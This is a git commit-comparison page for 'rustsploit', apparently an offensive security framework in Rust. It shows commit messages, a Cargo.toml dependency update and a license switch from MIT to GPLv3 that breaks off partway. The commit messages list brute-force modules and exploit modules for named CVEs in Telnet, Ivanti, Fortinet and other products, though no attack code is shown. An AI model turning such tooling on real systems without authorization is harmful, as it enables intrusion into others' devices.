Compare commits

...

132 Commits

Author SHA1 Message Date
S.B ee3d24f6e8 Update changelog-latest.md 2026-01-26 17:09:26 +02:00
S.B cbe7148938 Update utils.rs 2026-01-26 16:40:36 +02:00
S.B 4ec2631a2c Update ftp_bruteforce.rs 2026-01-26 16:39:28 +02:00
S.B 4d6d127045 Update ftp_anonymous.rs 2026-01-26 16:38:51 +02:00
S.B 7da29ae4fe Update telnet_auth_bypass_cve_2026_24061.rs 2026-01-26 16:37:27 +02:00
S.B edef9da2e5 Merge pull request #34 from s-b-repo/pheonix-arta
Pheonix arta
2026-01-26 11:16:50 +02:00
S.B 0bc088d6e5 Update changelog-latest.md 2026-01-26 11:09:44 +02:00
S.B 723241e50e Update Cargo.toml 2026-01-26 11:08:45 +02:00
S.B 63fb9e2387 Update mqtt_bruteforce.rs 2026-01-26 11:08:06 +02:00
S.B bd40afe476 Add files via upload 2026-01-26 11:07:10 +02:00
S.B 537541be89 Delete src/modules/exploits/ruijie directory 2026-01-26 11:06:42 +02:00
S.B 76a44bc3e7 Add files via upload 2026-01-26 10:22:49 +02:00
S.B 176402c12f Delete src/commands directory 2026-01-26 10:22:26 +02:00
S.B 2c67cfe4ee Add files via upload 2026-01-26 10:21:41 +02:00
S.B a4d94476e4 Delete src/modules/scanners directory 2026-01-26 10:21:13 +02:00
S.B 938b613cc1 Add files via upload 2026-01-26 10:20:47 +02:00
S.B 64a0067a36 Add files via upload 2026-01-26 10:19:46 +02:00
S.B 7feccde0b1 Add files via upload 2026-01-26 10:18:18 +02:00
S.B 84ccbb9ce1 Add files via upload 2026-01-26 10:17:22 +02:00
S.B 60a877ca57 Delete src/modules/exploits directory 2026-01-26 10:16:27 +02:00
S.B 2265480f99 Add files via upload 2026-01-26 10:16:01 +02:00
S.B 6de9934070 Delete src/modules/creds directory 2026-01-26 10:15:00 +02:00
S.B e0e2c4d8a9 Update utils.rs 2026-01-26 10:13:54 +02:00
S.B ba160cade8 Update main.rs 2026-01-26 10:13:28 +02:00
S.B 553180eb16 Update shell.rs 2026-01-26 10:13:09 +02:00
S.B 0b17d39a05 Update config.rs 2026-01-26 10:12:38 +02:00
S.B a348d440f8 Update cli.rs 2026-01-26 10:12:22 +02:00
S.B c60d8a69b3 Update api.rs 2026-01-26 10:12:02 +02:00
S.B cd48200b0e Update changelog-latest.md 2026-01-26 10:11:27 +02:00
S.B 566372adae Update readme.md 2026-01-26 10:09:43 +02:00
S.B 9cb1ec0eb7 Update README.md 2026-01-26 10:09:06 +02:00
S.B 5aa35e8fe4 Update Cargo.toml 2026-01-26 10:08:41 +02:00
S.B 7c17a96ba4 Update readme.md 2026-01-23 14:34:33 +02:00
S.B 4985537680 Update changelog-latest.md 2026-01-23 14:34:03 +02:00
S.B 3514bea13c Update README.md 2026-01-23 14:33:20 +02:00
S.B c69ecb237a Merge pull request #33 from s-b-repo/kindred-spirits
Kindred spirits
2026-01-23 14:22:40 +02:00
S.B d61d0987dc Update telnet_bruteforce.rs 2026-01-23 11:37:07 +02:00
S.B 102d618289 Update telnet_auth_bypass_cve_2026_24061.rs 2026-01-23 11:36:30 +02:00
S.B b5d0ce4c70 Update main.rs 2026-01-23 10:28:53 +02:00
S.B 82ff19dc9d Add files via upload 2026-01-23 10:15:09 +02:00
S.B 8d314e6d78 Update mod.rs 2026-01-23 10:12:33 +02:00
S.B aeaa894336 Update changelog-latest.md 2026-01-23 10:06:00 +02:00
S.B 1b407c349f Update changelog-latest.md 2026-01-23 10:05:04 +02:00
S.B 62cfce1b8d Update README.md 2026-01-22 16:36:07 +02:00
S.B c1f4aca340 Update Cargo.toml 2026-01-22 16:35:21 +02:00
S.B b6208db764 Update changelog-latest.md 2026-01-22 16:33:52 +02:00
S.B 66679ee09d Update utils.rs 2026-01-22 16:31:00 +02:00
S.B 4a4ad714b0 Remove proxy functionality from shell context
Removed proxy-related commands and functionality from the shell context, including loading, enabling, disabling, and testing proxies. Updated target setting commands to include shortcuts.
2026-01-22 16:30:22 +02:00
S.B cf95a3db70 Add core module to main.rs 2026-01-22 16:29:41 +02:00
S.B 5434430ad0 Add files via upload 2026-01-22 16:27:47 +02:00
S.B 6d33f0fdaa Delete src/modules/scanners directory 2026-01-22 16:26:44 +02:00
S.B 77124d25a2 Add files via upload 2026-01-22 16:25:33 +02:00
S.B 7ec5089ea8 Delete src/modules/exploits directory 2026-01-22 16:20:55 +02:00
S.B 587e11267a Add files via upload 2026-01-22 16:19:49 +02:00
S.B 65c6ec75b4 Delete src/modules/creds directory 2026-01-22 16:19:07 +02:00
S.B 6bbb9d3048 Add files via upload 2026-01-22 16:18:38 +02:00
S.B de6b598cd9 Delete src/commands directory 2026-01-22 16:18:10 +02:00
S.B d66f33193f Update ftp_bruteforce.rs 2026-01-18 18:53:33 +02:00
S.B be2237e39b Enhance FTP anonymous login checker with mass scan
Added support for mass scanning and improved IP exclusion handling.
2026-01-18 18:52:14 +02:00
S.B f4935c1f9e Update and rename rtsp_bruteforce_advanced.rs to rtsp_bruteforce.rs 2026-01-18 18:50:51 +02:00
S.B b646039f2e Add files via upload 2026-01-18 18:48:13 +02:00
S.B c6c577ed52 Delete src/modules/exploits/ftp directory 2026-01-18 18:47:22 +02:00
S.B 77639bcf8b Update Cargo.toml 2026-01-18 18:46:04 +02:00
S.B 49ab851ffe Add files via upload 2026-01-18 18:45:05 +02:00
S.B 03779dbe64 Update mod.rs 2026-01-18 18:44:35 +02:00
S.B e01e231579 Merge pull request #32 from s-b-repo/esoteric-markdown
Esoteric markdown
2026-01-17 01:06:24 +02:00
S.B 0b31da3384 Bump version from 0.3.5 to 0.4.3 2026-01-17 00:54:39 +02:00
S.B d8e0210d70 Refactor body creation for POST request 2026-01-17 00:46:12 +02:00
S.B 803c19c2af Update ivanti_epmm_cve_2023_35082.rs 2026-01-17 00:45:13 +02:00
S.B 41fd1ec33b Update Cargo.toml 2026-01-17 00:40:16 +02:00
S.B a6de04092a Add files via upload 2026-01-17 00:33:44 +02:00
S.B f08e88055a Delete src/modules/exploits/tplink directory 2026-01-17 00:33:02 +02:00
S.B 6a0446996e Update changelog-latest.md 2026-01-17 00:32:28 +02:00
S.B 9e9c78b1e5 Add module for CVE-2023-35082 exploit 2026-01-17 00:18:05 +02:00
S.B fea19075ce Add files via upload 2026-01-17 00:17:33 +02:00
S.B 5735f90860 Add files via upload 2026-01-17 00:15:38 +02:00
S.B 7df00dc03b Add files via upload 2026-01-17 00:14:56 +02:00
S.B 8d49f2e5cf Add files via upload 2026-01-17 00:13:49 +02:00
S.B 1d548818e6 Delete src/modules/exploits/fortios directory 2026-01-17 00:12:55 +02:00
S.B f66cf16931 Delete src/modules/exploits/fortiweb directory 2026-01-17 00:12:41 +02:00
S.B 9a9b8304cf Rename fortiweb and fortios modules to fortinet and add exim 2026-01-17 00:12:18 +02:00
S.B 51c0251798 Update changelog-latest.md 2026-01-17 00:11:31 +02:00
S.B 32bed1d2a4 Update changelog-latest.md 2026-01-16 23:24:01 +02:00
S.B 9f6d6361eb Add files via upload 2026-01-16 23:22:40 +02:00
S.B d56ad77d1e Delete src/commands directory 2026-01-16 23:22:03 +02:00
S.B 8a493954b6 Refactor build.rs for better module handling
Refactor build script to improve module discovery and dispatch generation.
2026-01-16 23:21:46 +02:00
S.B c247b3b5ab Update Cargo.toml 2026-01-16 23:20:22 +02:00
S.B 6aadd98518 Add files via upload 2026-01-16 23:04:38 +02:00
S.B b1759d0f86 Delete src/modules/exploits/tplink directory 2026-01-16 23:04:13 +02:00
S.B fe15591faa Update changelog-latest.md 2026-01-16 23:03:42 +02:00
S.B 3b4accba35 Update changelog-latest.md 2026-01-16 22:38:10 +02:00
S.B 1534b9aa95 Add command chaining instructions to README
Added command chaining section to README with examples.
2026-01-16 22:36:26 +02:00
S.B a014f9e485 Document command chaining feature
Add section on command chaining in the shell.
2026-01-16 22:35:40 +02:00
S.B 34cb58ee01 Update main.rs 2026-01-16 22:34:12 +02:00
S.B ac8c0e18df Update utils.rs 2026-01-16 22:33:17 +02:00
S.B cb1ff2b4e0 Add files via upload 2026-01-16 22:29:49 +02:00
S.B 7a2af6fdf1 Delete src/modules/scanners directory 2026-01-16 22:28:59 +02:00
S.B 290f859058 Add files via upload 2026-01-16 22:20:41 +02:00
S.B a3bd842971 Delete src/modules/exploits directory 2026-01-16 22:14:54 +02:00
S.B f38aea01c2 Add files via upload 2026-01-16 22:14:19 +02:00
S.B 7b0a246ccc Delete src/modules/creds directory 2026-01-16 22:05:40 +02:00
S.B 718719b7d1 Delete src/test 2026-01-13 16:51:52 +02:00
S.B 2876abdbb1 Update Cargo.toml 2026-01-13 16:51:30 +02:00
S.B 6f98db53a5 Add new exploit modules and upgrade dependencies
Implemented new exploit modules for MongoBleed, NginxPwner, Hikvision, n8n, and FortiWeb, along with various updates and fixes to existing modules. Upgraded dependencies and resolved compilation errors across the project.
2026-01-13 16:50:45 +02:00
S.B c1bce55552 Create LICENSE 2026-01-12 07:17:21 +02:00
S.B c0aec6ed64 Delete LICENSE 2026-01-12 07:16:33 +02:00
S.B dbd2b50ef2 Delete .github/workflows directory 2026-01-05 07:57:41 +02:00
S.B eb2e8542a9 Add pnet dependency and update home for 2024 2026-01-05 07:56:21 +02:00
S.B f02c6a2274 Create changelog-latest.md 2026-01-05 07:55:33 +02:00
S.B 5650be5720 Create changelog.md 2026-01-05 07:55:04 +02:00
S.B 4ee5eeab42 Add files via upload 2026-01-05 00:51:03 -05:00
S.B 818a82982f Add files via upload 2026-01-05 00:47:55 -05:00
S.B f4d7c45f1d Create test 2026-01-05 07:47:04 +02:00
S.B 421b2508a0 Delete src directory 2026-01-05 07:34:14 +02:00
S.B e4066ceea6 Delete changelog directory 2026-01-05 07:30:21 +02:00
S.B 0f2d4cad8a Update README.md 2026-01-05 07:27:56 +02:00
S.B 1a53215512 Update readme.md 2026-01-05 07:26:59 +02:00
S.B 34aa655e36 Create Latest-changelog.md 2026-01-05 07:16:09 +02:00
S.B 1741c043f9 Delete changelog/archive/changelog-2026.md 2026-01-05 07:15:46 +02:00
S.B b1ac4e0190 Create changelog-2026.md 2026-01-05 07:15:28 +02:00
S.B 1b4dfca8e2 Delete changelog/test 2026-01-05 07:14:05 +02:00
S.B a78073381b Delete changelog/archive/test 2026-01-05 07:13:55 +02:00
S.B 17e081eb16 Create changelog.md 2026-01-05 07:13:43 +02:00
S.B 5299059ca8 Create test 2026-01-05 07:12:59 +02:00
S.B d489e5d2e3 Create test 2026-01-05 07:12:43 +02:00
S.B 337d7d5249 Delete changelog/archive/2025 directory 2026-01-05 07:11:31 +02:00
S.B ef5457d00a Add files via upload 2026-01-05 00:11:17 -05:00
S.B 0164912f52 Delete changlog/archived/2025 directory 2026-01-05 07:10:05 +02:00
S.B d62c65e8fb Create changelog.md 2026-01-05 07:09:46 +02:00
S.B cdeed7c799 Delete changelog.md 2026-01-05 07:08:57 +02:00
S.B da075a08ce Merge pull request #30 from s-b-repo/cliptic-raxirtos
Cliptic raxirtos
2025-12-09 23:49:43 +02:00
S.B 30396b2414 Merge pull request #29 from s-b-repo/cliptic-raxirtos
Cliptic raxirtos
2025-12-07 20:21:36 +02:00
156 changed files with 24888 additions and 9984 deletions
-22
View File
@@ -1,22 +0,0 @@
name: Rust
on:
push:
branches: [ "main" ]
pull_request:
branches: [ "main" ]
env:
CARGO_TERM_COLOR: always
jobs:
build:
runs-on: Kali
steps:
- uses: actions/checkout@v4
- name: Build
run: cargo build --verbose
- name: Run tests
run: cargo test --verbose
+63 -27
View File
@@ -1,6 +1,6 @@
[package]
name = "rustsploit"
version = "0.3.5"
version = "0.5.0"
edition = "2024"
build = "build.rs"
@@ -13,48 +13,49 @@ path = "src/main.rs"
anyhow = "1.0"
colored = "3.0" # newer than 2.0
rand = "0.9"
rustyline = "15.0"
sysinfo = { version = "0.36", features = ["multithread"] }
rustyline = "17.0"
sysinfo = { version = "0.38", features = ["multithread"] }
# CLI & Async runtime
clap = { version = "4.5", features = ["derive"] }
tokio = { version = "1.44", features = ["full", "process", "fs", "io-std", "rt-multi-thread", "macros", "rt"] }
tokio = { version = "1.49", features = ["full", "process", "fs", "io-std", "rt-multi-thread", "macros", "rt"] }
# HTTP & Web
reqwest = { version = "0.12", features = ["json", "cookies", "socks"] }
h2 = "0.3"
http = "0.2"
bytes = "1.0"
tokio-rustls = "0.24"
reqwest = { version = "0.13", features = ["json", "cookies", "socks"] }
h2 = "0.4"
http = "1.4"
bytes = "1.11"
tokio-rustls = "0.26"
url = "2.5"
quick-xml = "0.37"
data-encoding = "2.5"
urlencoding = "2.1"
quick-xml = "0.39"
data-encoding = "2.10"
semver = "1.0"
# Crypto & Encoding
aes = "0.8"
cipher = "0.4"
md5 = "0.7"
md5 = "0.8"
sha2 = "0.10"
hex = "0.4"
flate2 = "1.0"
flate2 = "1.1"
base64 = "0.22"
# Networking & Protocols
tokio-socks = "0.5"
socket2 = { version = "0.5", features = ["all"] }
pnet_packet = "0.34"
socket2 = { version = "0.6", features = ["all"] }
pnet_packet = "0.35"
ipnet = "2.11"
ipnetwork = "0.20"
regex = "1.11" # newest listed
ipnetwork = "0.21"
regex = "1.12" # newest listed
which = "8.0"
# FTP
async_ftp = "6.0"
suppaftp = { version = "6.3", features = ["async", "async-native-tls", "native-tls"] }
suppaftp = { version = "8.0", features = ["tokio-async-native-tls"] }
native-tls = "0.2"
rustls = "0.23"
webpki-roots = "0.26"
webpki-roots = "1.0"
# Telnet
threadpool = "1.8"
@@ -63,9 +64,13 @@ telnet = "0.2"
async-stream = "0.3.6"
# SSH
ssh2 = "0.9"
libc = "0.2"
# Bluetooth
btleplug = "0.11"
# RDP - removed unused dependency (module uses external xfreerdp/rdesktop commands)
# rdp = "0.12"
@@ -73,7 +78,7 @@ libc = "0.2"
walkdir = "2.5"
# WebSocket (Spotube exploit)
tokio-tungstenite = "0.26"
tokio-tungstenite = "0.28"
# Futures
futures = "0.3"
@@ -85,30 +90,61 @@ serde_json = "1.0"
chrono = { version = "0.4", features = ["serde"] }
# API Server (Axum)
axum = "0.7"
axum = "0.8"
tower = "0.5"
tower-http = { version = "0.6", features = ["cors", "trace", "limit"] }
uuid = { version = "1.10", features = ["v4"] }
uuid = { version = "1.19", features = ["v4", "serde"] }
# DNS
hickory-client = { version = "0.24", features = ["dnssec"] }
hickory-proto = "0.24"
hickory-client = { version = "0.25" }
hickory-proto = "0.25"
# Misc utilities
once_cell = "1.19"
once_cell = "1.21"
home = "0.5" # updated for edition 2024 compatibility
pnet = "0.35"
des = { version = "0.8.1", features = ["zeroize"] }
strsim = "0.11"
byteorder = "1.5.0"
ssh2 = "0.9.5"
[build-dependencies]
regex = "1.11"
regex = "1.12"
walkdir = "2.5"
# Dependency overrides to address security warnings in transitive dependencies
# Note: These are warnings (not vulnerabilities) in transitive dependencies
# async-std warning: suppaftp uses async-std internally - waiting for upstream fix
# The other warnings (atomic-polyfill, atty) are resolved by removing unused rdp dependency
# ============================================
# Development profile: Fast incremental builds
# ============================================
[profile.dev]
opt-level = 0 # No optimization for fastest compile
debug = true # Keep debug symbols
incremental = true # Enable incremental compilation
split-debuginfo = "unpacked" # Faster link times
# Optimize dependencies in dev mode (they don't change often)
[profile.dev.package."*"]
opt-level = 2 # Deps are optimized but your code isn't
# ============================================
# Release profile: Maximum performance
# ============================================
[profile.release]
opt-level = 3
lto = "fat"
codegen-units = 1
panic = "abort"
strip = true
# ============================================
# Custom profile: Fast release builds for testing
# Usage: cargo build --profile fast-release
# ============================================
[profile.fast-release]
inherits = "release"
lto = "thin" # Faster than fat LTO
codegen-units = 4 # Parallel codegen
+670 -17
View File
@@ -1,21 +1,674 @@
MIT License
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (c) 2025 S.B
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
Preamble
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
